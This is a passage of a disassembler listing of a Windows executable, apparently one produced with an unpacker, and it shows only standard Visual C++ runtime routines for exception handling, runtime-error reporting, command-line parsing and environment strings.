push dword ptr [ebp-28h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B174 ; LCMapStringA
mov [ebp-24h], eax
cmp eax, ebx
jnz short loc_425EAA
loc_425EA6: ; CODE XREF: sub_425B55+31E�j
xor esi, esi
jmp short loc_425ED0
; ---------------------------------------------------------------------------
loc_425EAA: ; CODE XREF: sub_425B55+34F�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
lea eax, [ebp-24h]
push eax
push edi
push dword ptr [ebp+20h]
push dword ptr [ebp-40h]
call sub_42831E
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_425ED0
; ---------------------------------------------------------------------------
loc_425ECD: ; CODE XREF: sub_425B55+2D0�j
mov esi, [ebp-48h]
loc_425ED0: ; CODE XREF: sub_425B55+353�j
; sub_425B55+376�j
cmp [ebp-3Ch], ebx
jz short loc_425EF8
push edi
call sub_41E2A1
pop ecx
jmp short loc_425EF8
; ---------------------------------------------------------------------------
loc_425EDE: ; CODE XREF: sub_425B55+295�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B174 ; LCMapStringA
mov esi, eax
loc_425EF8: ; CODE XREF: sub_425B55+37E�j
; sub_425B55+387�j
cmp [ebp-28h], ebx
jz short loc_425F06
push dword ptr [ebp-28h]
call sub_41E2A1
pop ecx
loc_425F06: ; CODE XREF: sub_425B55+3A6�j
mov eax, esi
loc_425F08: ; CODE XREF: sub_425B55+253�j
; sub_425B55+28D�j
lea esp, [ebp-54h]
call sub_425F4F
retn
sub_425B55 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_425F14 proc near ; CODE XREF: start-C32EC�p
; sub_422B83-2A�p ...
arg_4 = dword ptr 8
push offset loc_425F68
mov eax, large fs:0
push eax
mov eax, [esp+8+arg_4]
mov [esp+8+arg_4], ebp
lea ebp, [esp+8+arg_4]
sub esp, eax
push ebx
push esi
push edi
mov eax, [ebp-8]
mov [ebp-18h], esp
push eax
mov eax, [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov [ebp-8], eax
lea eax, [ebp-10h]
mov large fs:0, eax
retn
sub_425F14 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425F4F proc near ; CODE XREF: start-C311D�p
; sub_423257:loc_423295�p ...
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
leave
push ecx
retn
sub_425F4F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 30324356h, 30304358h
; ---------------------------------------------------------------------------
loc_425F68: ; DATA XREF: sub_425F14�o
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_426031
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
push ebx
call sub_4284E7
add esp, 4
or eax, eax
jz short loc_426023
loc_425FA8: ; CODE XREF: seg000:0042601A�j
cmp esi, 0FFFFFFFFh
jz short loc_42602A
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4+4]
or eax, eax
jz short loc_426011
push esi
push ebp
lea ebp, [ebx+10h]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_426011
js short loc_42601C
mov edi, [ebx+8]
push ebx
call sub_420274
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4202B6
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_42034A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
mov eax, [edi+ecx*4+8]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
loc_426011: ; CODE XREF: seg000:00425FB6�j
; seg000:00425FD0�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_425FA8
; ---------------------------------------------------------------------------
loc_42601C: ; CODE XREF: seg000:00425FD2�j
mov eax, 0
jmp short loc_426046
; ---------------------------------------------------------------------------
loc_426023: ; CODE XREF: seg000:00425FA6�j
mov eax, [ebp+8]
or dword ptr [eax+4], 8
loc_42602A: ; CODE XREF: seg000:00425FAB�j
mov eax, 1
jmp short loc_426046
; ---------------------------------------------------------------------------
loc_426031: ; CODE XREF: seg000:00425F80�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4202B6
add esp, 8
pop ebp
mov eax, 1
loc_426046: ; CODE XREF: seg000:00426021�j
; seg000:0042602F�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
dw 8B55h
dd 8B08244Ch, 1C418B29h, 18418B50h, 0A254E850h, 0C483FFFFh
dd 4C25D08h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=8Ch
sub_426069 proc near ; CODE XREF: sub_420CE8+12�p
; start-C3211�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-8Ch]
sub esp, 10Ch
mov eax, ds:dword_4437D4
mov ecx, [ebp+8Ch+arg_0]
push ebx
push esi
mov [ebp+8Ch+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_42608F: ; CODE XREF: sub_426069+33�j
cmp ecx, ds:dword_443A88[eax*8]
jz short loc_42609E
inc eax
cmp eax, 13h
jb short loc_42608F
loc_42609E: ; CODE XREF: sub_426069+2D�j
mov esi, eax
shl esi, 3
cmp ecx, ds:dword_443A88[esi]
jnz loc_4261C4
mov eax, ds:dword_4E295C
cmp eax, 1
jz loc_42619C
cmp eax, edx
jnz short loc_4260CE
cmp ds:dword_4437C4, 1
jz loc_42619C
loc_4260CE: ; CODE XREF: sub_426069+56�j
cmp ecx, 0FCh
jz loc_4261C4
push 104h
lea eax, [ebp+8Ch+var_10C]
push eax
push edx
mov [ebp+8Ch+var_8], dl
call ds:dword_42B00C ; GetModuleFileNameA
test eax, eax
jnz short loc_426104
lea eax, [ebp+8Ch+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41EEC0
pop ecx
pop ecx
loc_426104: ; CODE XREF: sub_426069+89�j
lea edi, [ebp+8Ch+var_10C]
mov eax, edi
push eax
call sub_41E1C0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_426138
mov eax, edi
push eax
call sub_41E1C0
mov edi, eax
lea eax, [ebp+8Ch+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_41E860
add esp, 10h
loc_426138: ; CODE XREF: sub_426069+AB�j
push edi
call sub_41E1C0
push ds:off_443A8C[esi]
mov ebx, eax
call sub_41E1C0
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_41EA20
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41EEC0
push edi
push ebx
call sub_41EED0
push offset asc_43A018 ; "\n\n"
push ebx
call sub_41EED0
push ds:off_443A8C[esi]
push ebx
call sub_41EED0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_428710
add esp, 2Ch
jmp short loc_4261C4
; ---------------------------------------------------------------------------
loc_42619C: ; CODE XREF: sub_426069+4E�j
; sub_426069+5F�j
push edx
lea eax, [ebp+8Ch+arg_0]
push eax
lea esi, off_443A8C[esi]
push dword ptr [esi]
call sub_41E1C0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_42B188 ; GetStdHandle
push eax
call ds:dword_42B084 ; WriteFile
loc_4261C4: ; CODE XREF: sub_426069+40�j
; sub_426069+6B�j ...
lea esp, [ebp-8Ch]
mov ecx, [ebp+8Ch+var_4]
call sub_422B83
pop edi
pop esi
pop ebx
add ebp, 8Ch
leave
retn
sub_426069 endp
; =============== S U B R O U T I N E =======================================
sub_4261E0 proc near ; CODE XREF: sub_420CE8+9�p
; start-C3218�p
mov eax, ds:dword_4E295C
cmp eax, 1
jz short loc_4261F7
test eax, eax
jnz short locret_426218
cmp ds:dword_4437C4, 1
jnz short locret_426218
loc_4261F7: ; CODE XREF: sub_4261E0+8�j
push 0FCh
call sub_426069
mov eax, ds:dword_4E29C0
test eax, eax
pop ecx
jz short loc_42620D
call eax
loc_42620D: ; CODE XREF: sub_4261E0+29�j
push 0FFh
call sub_426069
pop ecx
locret_426218: ; CODE XREF: sub_4261E0+C�j
; sub_4261E0+15�j
retn
sub_4261E0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, ds:dword_443BA0
push ebx
mov ecx, offset dword_443B20
push esi
loc_42622B: ; CODE XREF: seg000:0042623E�j
cmp [ecx], edx
jz short loc_426240
lea esi, [eax+eax*2]
add ecx, 0Ch
lea esi, ds:443B20h[esi*4]
cmp ecx, esi
jb short loc_42622B
loc_426240: ; CODE XREF: seg000:0042622D�j
lea eax, [eax+eax*2]
lea eax, ds:443B20h[eax*4]
cmp ecx, eax
jnb short loc_426252
cmp [ecx], edx
jz short loc_426254
loc_426252: ; CODE XREF: seg000:0042624C�j
xor ecx, ecx
loc_426254: ; CODE XREF: seg000:00426250�j
test ecx, ecx
jz loc_42637D
mov ebx, [ecx+8]
test ebx, ebx
jz loc_42637D
cmp ebx, 5
jnz short loc_426278
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_426386
; ---------------------------------------------------------------------------
loc_426278: ; CODE XREF: seg000:0042626A�j
cmp ebx, 1
jz loc_426378
mov eax, ds:dword_4E29C4
mov [ebp+8], eax
mov eax, [ebp+0Ch]
mov ds:dword_4E29C4, eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_426368
mov eax, ds:dword_443B98
mov edx, ds:dword_443B9C
add edx, eax
cmp eax, edx
jge short loc_4262C3
lea esi, [eax+eax*2]
lea esi, ds:443B28h[esi*4]
sub edx, eax
loc_4262BA: ; CODE XREF: seg000:004262C1�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_4262BA
loc_4262C3: ; CODE XREF: seg000:004262AC�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov esi, ds:dword_443BA4
jnz short loc_4262DF
mov ds:dword_443BA4, 83h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_4262DF: ; CODE XREF: seg000:004262D1�j
cmp ecx, 0C0000090h
jnz short loc_4262F3
mov ds:dword_443BA4, 81h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_4262F3: ; CODE XREF: seg000:004262E5�j
cmp ecx, 0C0000091h
jnz short loc_426307
mov ds:dword_443BA4, 84h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_426307: ; CODE XREF: seg000:004262F9�j
cmp ecx, 0C0000093h
jnz short loc_42631B
mov ds:dword_443BA4, 85h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_42631B: ; CODE XREF: seg000:0042630D�j
cmp ecx, 0C000008Dh
jnz short loc_42632F
mov ds:dword_443BA4, 82h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_42632F: ; CODE XREF: seg000:00426321�j
cmp ecx, 0C000008Fh
jnz short loc_426343
mov ds:dword_443BA4, 86h
jmp short loc_426355
; ---------------------------------------------------------------------------
loc_426343: ; CODE XREF: seg000:00426335�j
cmp ecx, 0C0000092h
jnz short loc_426355
mov ds:dword_443BA4, 8Ah
loc_426355: ; CODE XREF: seg000:004262DD�j
; seg000:004262F1�j ...
push ds:dword_443BA4
push 8
call ebx ; PeekNamedPipe
pop ecx
mov ds:dword_443BA4, esi
jmp short loc_42636F
; ---------------------------------------------------------------------------
loc_426368: ; CODE XREF: seg000:00426297�j
and dword ptr [ecx+8], 0
push eax
call ebx ; PeekNamedPipe
loc_42636F: ; CODE XREF: seg000:00426366�j
mov eax, [ebp+8]
pop ecx
mov ds:dword_4E29C4, eax
loc_426378: ; CODE XREF: seg000:0042627B�j
or eax, 0FFFFFFFFh
jmp short loc_426386
; ---------------------------------------------------------------------------
loc_42637D: ; CODE XREF: seg000:00426256�j
; seg000:00426261�j
push dword ptr [ebp+0Ch]
call ds:dword_42B16C ; UnhandledExceptionFilter
loc_426386: ; CODE XREF: seg000:00426273�j
; seg000:0042637B�j
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_42638A proc near ; CODE XREF: start-C318D�p
push esi
push edi
xor edi, edi
cmp ds:dword_4E3F30, edi
jnz short loc_42639B
call sub_4230FC
loc_42639B: ; CODE XREF: sub_42638A+A�j
mov esi, ds:dword_4E2F04
test esi, esi
jnz short loc_4263AA
mov esi, offset byte_42B633
loc_4263AA: ; CODE XREF: sub_42638A+19�j
; sub_42638A+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_4263B8
test al, al
jz short loc_4263E2
test edi, edi
jz short loc_4263DC
loc_4263B8: ; CODE XREF: sub_42638A+24�j
cmp al, 22h
jnz short loc_4263C5
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_4263C5: ; CODE XREF: sub_42638A+30�j
movzx eax, al
push eax
call sub_42883C
test eax, eax
pop ecx
jz short loc_4263D4
inc esi
loc_4263D4: ; CODE XREF: sub_42638A+47�j
inc esi
jmp short loc_4263AA
; ---------------------------------------------------------------------------
loc_4263D7: ; CODE XREF: sub_42638A+56�j
cmp al, 20h
ja short loc_4263E2
inc esi
loc_4263DC: ; CODE XREF: sub_42638A+2C�j
mov al, [esi]
test al, al
jnz short loc_4263D7
loc_4263E2: ; CODE XREF: sub_42638A+28�j
; sub_42638A+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_42638A endp
; =============== S U B R O U T I N E =======================================
sub_4263E7 proc near ; CODE XREF: start:loc_420E3F�p
push ebx
xor ebx, ebx
cmp ds:dword_4E3F30, ebx
push esi
push edi
jnz short loc_4263F9
call sub_4230FC
loc_4263F9: ; CODE XREF: sub_4263E7+B�j
mov esi, ds:dword_4E2954
xor edi, edi
cmp esi, ebx
jnz short loc_426417
jmp short loc_426437
; ---------------------------------------------------------------------------
loc_426407: ; CODE XREF: sub_4263E7+34�j
cmp al, 3Dh
jz short loc_42640C
inc edi
loc_42640C: ; CODE XREF: sub_4263E7+22�j
push esi
call sub_41E1C0
pop ecx
lea esi, [esi+eax+1]
loc_426417: ; CODE XREF: sub_4263E7+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_426407
lea eax, ds:4[edi*4]
push eax
call sub_41E5D3
mov edi, eax
cmp edi, ebx
pop ecx
mov ds:dword_4E2920, edi
jnz short loc_42643C
loc_426437: ; CODE XREF: sub_4263E7+1E�j
or eax, 0FFFFFFFFh
jmp short loc_426494
; ---------------------------------------------------------------------------
loc_42643C: ; CODE XREF: sub_4263E7+4E�j
mov esi, ds:dword_4E2954
push ebp
jmp short loc_42646F
; ---------------------------------------------------------------------------
loc_426445: ; CODE XREF: sub_4263E7+8A�j
push esi
call sub_41E1C0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_42646D
push ebp
call sub_41E5D3
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_426498
push esi
push eax
call sub_41EEC0
pop ecx
pop ecx
add edi, 4
loc_42646D: ; CODE XREF: sub_4263E7+6B�j
add esi, ebp
loc_42646F: ; CODE XREF: sub_4263E7+5C�j
cmp [esi], bl
jnz short loc_426445
push ds:dword_4E2954
call sub_41E2A1
mov ds:dword_4E2954, ebx
mov [edi], ebx
mov ds:dword_4E3F24, 1
xor eax, eax
loc_426492: ; CODE XREF: sub_4263E7+C5�j
pop ecx
pop ebp
loc_426494: ; CODE XREF: sub_4263E7+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_426498: ; CODE XREF: sub_4263E7+78�j
push ds:dword_4E2920
call sub_41E2A1
mov ds:dword_4E2920, ebx
or eax, 0FFFFFFFFh
jmp short loc_426492
sub_4263E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4264AE proc near ; CODE XREF: sub_42661A+54�p
; sub_42661A+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_4264D1
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_4264D1: ; CODE XREF: sub_4264AE+18�j
; sub_4264AE+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_4264E4
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_426511
; ---------------------------------------------------------------------------
loc_4264E4: ; CODE XREF: sub_4264AE+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_4264EF
mov cl, [eax]
mov [edi], cl
inc edi
loc_4264EF: ; CODE XREF: sub_4264AE+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test ds:byte_4E2CC1[ebx], 4
jz short loc_42650A
inc dword ptr [esi]
test edi, edi
jz short loc_426509
mov bl, [eax]
mov [edi], bl
inc edi
loc_426509: ; CODE XREF: sub_4264AE+54�j
inc eax
loc_42650A: ; CODE XREF: sub_4264AE+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_426543
loc_426511: ; CODE XREF: sub_4264AE+34�j
test edx, edx
jnz short loc_4264D1
cmp cl, 20h
jz short loc_42651F
cmp cl, 9
jnz short loc_4264D1
loc_42651F: ; CODE XREF: sub_4264AE+6A�j
test edi, edi
jz short loc_426527
mov byte ptr [edi-1], 0
loc_426527: ; CODE XREF: sub_4264AE+73�j
; sub_4264AE+96�j
and [ebp+var_4], 0
loc_42652B: ; CODE XREF: sub_4264AE+157�j
cmp byte ptr [eax], 0
jz loc_42660A
loc_426534: ; CODE XREF: sub_4264AE+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_426540
cmp cl, 9
jnz short loc_426546
loc_426540: ; CODE XREF: sub_4264AE+8B�j
inc eax
jmp short loc_426534
; ---------------------------------------------------------------------------
loc_426543: ; CODE XREF: sub_4264AE+61�j
dec eax
jmp short loc_426527
; ---------------------------------------------------------------------------
loc_426546: ; CODE XREF: sub_4264AE+90�j
cmp byte ptr [eax], 0
jz loc_42660A
cmp [ebp+arg_0], 0
jz short loc_42655E
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_42655E: ; CODE XREF: sub_4264AE+A5�j
inc dword ptr [ebx]
loc_426560: ; CODE XREF: sub_4264AE+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_426569
; ---------------------------------------------------------------------------
loc_426567: ; CODE XREF: sub_4264AE+BE�j
inc eax
inc edx
loc_426569: ; CODE XREF: sub_4264AE+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_426567
cmp byte ptr [eax], 22h
jnz short loc_426599
test dl, 1
jnz short loc_426597
cmp [ebp+var_4], 0
jz short loc_42658A
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_42658A
mov eax, ecx
jmp short loc_42658C
; ---------------------------------------------------------------------------
loc_42658A: ; CODE XREF: sub_4264AE+CE�j
; sub_4264AE+D6�j
xor ebx, ebx
loc_42658C: ; CODE XREF: sub_4264AE+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_426597: ; CODE XREF: sub_4264AE+C8�j
shr edx, 1
loc_426599: ; CODE XREF: sub_4264AE+C3�j
test edx, edx
jz short loc_4265AA
loc_42659D: ; CODE XREF: sub_4264AE+FA�j
test edi, edi
jz short loc_4265A5
mov byte ptr [edi], 5Ch
inc edi
loc_4265A5: ; CODE XREF: sub_4264AE+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_42659D
loc_4265AA: ; CODE XREF: sub_4264AE+ED�j
mov cl, [eax]
test cl, cl
jz short loc_4265F8
cmp [ebp+var_4], 0
jnz short loc_4265C0
cmp cl, 20h
jz short loc_4265F8
cmp cl, 9
jz short loc_4265F8
loc_4265C0: ; CODE XREF: sub_4264AE+106�j
test ebx, ebx
jz short loc_4265F2
test edi, edi
jz short loc_4265E1
movzx edx, cl
test ds:byte_4E2CC1[edx], 4
jz short loc_4265DA
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_4265DA: ; CODE XREF: sub_4264AE+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_4265F0
; ---------------------------------------------------------------------------
loc_4265E1: ; CODE XREF: sub_4264AE+118�j
movzx ecx, cl
test ds:byte_4E2CC1[ecx], 4
jz short loc_4265F0
inc eax
inc dword ptr [esi]
loc_4265F0: ; CODE XREF: sub_4264AE+131�j
; sub_4264AE+13D�j
inc dword ptr [esi]
loc_4265F2: ; CODE XREF: sub_4264AE+114�j
inc eax
jmp loc_426560
; ---------------------------------------------------------------------------
loc_4265F8: ; CODE XREF: sub_4264AE+100�j
; sub_4264AE+10B�j ...
test edi, edi
jz short loc_426600
mov byte ptr [edi], 0
inc edi
loc_426600: ; CODE XREF: sub_4264AE+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_42652B
; ---------------------------------------------------------------------------
loc_42660A: ; CODE XREF: sub_4264AE+80�j
; sub_4264AE+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_426614
and dword ptr [eax], 0
loc_426614: ; CODE XREF: sub_4264AE+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_4264AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42661A proc near ; CODE XREF: start-C31D2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_4E3F30, edi
jnz short loc_426631
call sub_4230FC
loc_426631: ; CODE XREF: sub_42661A+10�j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
mov ds:byte_4E2ACC, 0
call ds:dword_42B00C ; GetModuleFileNameA
mov eax, ds:dword_4E2F04
cmp eax, edi
mov ds:off_4E2930, esi
jz short loc_426660
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_426662
loc_426660: ; CODE XREF: sub_42661A+3D�j
mov ebx, esi
loc_426662: ; CODE XREF: sub_42661A+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_4264AE
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_41E5D3
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_426692
or eax, 0FFFFFFFFh
jmp short loc_4266B7
; ---------------------------------------------------------------------------
loc_426692: ; CODE XREF: sub_42661A+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_4264AE
mov eax, [ebp+var_4]
dec eax
pop ecx
mov ds:dword_4E2914, eax
pop ecx
mov ds:dword_4E2918, edi
xor eax, eax
loc_4266B7: ; CODE XREF: sub_42661A+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_42661A endp
; =============== S U B R O U T I N E =======================================
sub_4266BC proc near ; CODE XREF: start-C31DC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4E2AD0
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_42B15C
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_426705
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4266EC
mov ds:dword_4E2AD0, 1
jmp short loc_42670A
; ---------------------------------------------------------------------------
loc_4266EC: ; CODE XREF: sub_4266BC+22�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_426700
mov eax, ebp
mov ds:dword_4E2AD0, eax
jmp short loc_426705
; ---------------------------------------------------------------------------
loc_426700: ; CODE XREF: sub_4266BC+39�j
mov eax, ds:dword_4E2AD0
loc_426705: ; CODE XREF: sub_4266BC+1A�j
; sub_4266BC+42�j
cmp eax, 1
jnz short loc_426787
loc_42670A: ; CODE XREF: sub_4266BC+2E�j
cmp esi, ebx
jnz short loc_426716
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_42678F
loc_426716: ; CODE XREF: sub_4266BC+50�j
cmp [esi], bx
mov eax, esi
jz short loc_42672B
loc_42671D: ; CODE XREF: sub_4266BC+66�j
; sub_4266BC+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_42671D
add eax, ebp
cmp [eax], bx
jnz short loc_42671D
loc_42672B: ; CODE XREF: sub_4266BC+5F�j
mov edi, ds:dword_42B090
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_42677C
push ebp
call sub_41E5D3
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_42677C
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_426778
push [esp+18h+var_8]
call sub_41E2A1
pop ecx
mov [esp+18h+var_8], ebx
loc_426778: ; CODE XREF: sub_4266BC+AC�j
mov ebx, [esp+18h+var_8]
loc_42677C: ; CODE XREF: sub_4266BC+8C�j
; sub_4266BC+9B�j
push esi
call ds:dword_42B160 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4267D7
; ---------------------------------------------------------------------------
loc_426787: ; CODE XREF: sub_4266BC+4C�j
cmp eax, ebp
jz short loc_426793
cmp eax, ebx
jz short loc_426793
loc_42678F: ; CODE XREF: sub_4266BC+58�j
; sub_4266BC+E1�j
xor eax, eax
jmp short loc_4267D7
; ---------------------------------------------------------------------------
loc_426793: ; CODE XREF: sub_4266BC+CD�j
; sub_4266BC+D1�j
call ds:dword_42B164 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz short loc_42678F
cmp [esi], bl
jz short loc_4267AD
loc_4267A3: ; CODE XREF: sub_4266BC+EA�j
; sub_4266BC+EF�j
inc eax
cmp [eax], bl
jnz short loc_4267A3
inc eax
cmp [eax], bl
jnz short loc_4267A3
loc_4267AD: ; CODE XREF: sub_4266BC+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_41E5D3
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_4267C3
xor edi, edi
jmp short loc_4267CE
; ---------------------------------------------------------------------------
loc_4267C3: ; CODE XREF: sub_4266BC+101�j
push ebp
push esi
push edi
call sub_41F400
add esp, 0Ch
loc_4267CE: ; CODE XREF: sub_4266BC+105�j
push esi
call ds:dword_42B168 ; FreeEnvironmentStringsA
mov eax, edi
loc_4267D7: ; CODE XREF: sub_4266BC+C9�j
; sub_4266BC+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4266BC endp
; =============== S U B R O U T I N E =======================================
sub_4267DE proc near ; CODE XREF: sub_426A43:loc_426BD6�p
push ebx
push ebp
push esi
push edi
or ebx, 0FFFFFFFFh
xor esi, esi
xor edx, edx
mov ecx, offset dword_4E2BA0
mov edi, 100h
loc_4267F3: ; CODE XREF: sub_4267DE+54�j
mov eax, [ecx]
test eax, eax
jz short loc_426836
lea ebp, [eax+100h]
jmp short loc_42680E
; ---------------------------------------------------------------------------
loc_426801: ; CODE XREF: sub_4267DE+32�j
test byte ptr [eax+4], 1
jz short loc_426814
mov ebp, [ecx]
add eax, 8
add ebp, edi
loc_42680E: ; CODE XREF: sub_4267DE+21�j
cmp eax, ebp
jb short loc_426801
jmp short loc_426825
; ---------------------------------------------------------------------------
loc_426814: ; CODE XREF: sub_4267DE+27�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, edx
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_426874
loc_426825: ; CODE XREF: sub_4267DE+34�j
add ecx, 4
inc esi
add edx, 20h
cmp ecx, offset dword_4E2CA0
jl short loc_4267F3
jmp short loc_426874
; ---------------------------------------------------------------------------
loc_426836: ; CODE XREF: sub_4267DE+19�j
push edi
call sub_41E5D3
test eax, eax
pop ecx
jz short loc_426874
add ds:dword_4E2B98, 20h
lea ecx, ds:4E2BA0h[esi*4]
mov [ecx], eax
lea edx, [eax+100h]
jmp short loc_42686B
; ---------------------------------------------------------------------------
loc_426859: ; CODE XREF: sub_4267DE+8F�j
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, edi
loc_42686B: ; CODE XREF: sub_4267DE+79�j
cmp eax, edx
jb short loc_426859
shl esi, 5
mov ebx, esi
loc_426874: ; CODE XREF: sub_4267DE+45�j
; sub_4267DE+56�j ...
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn
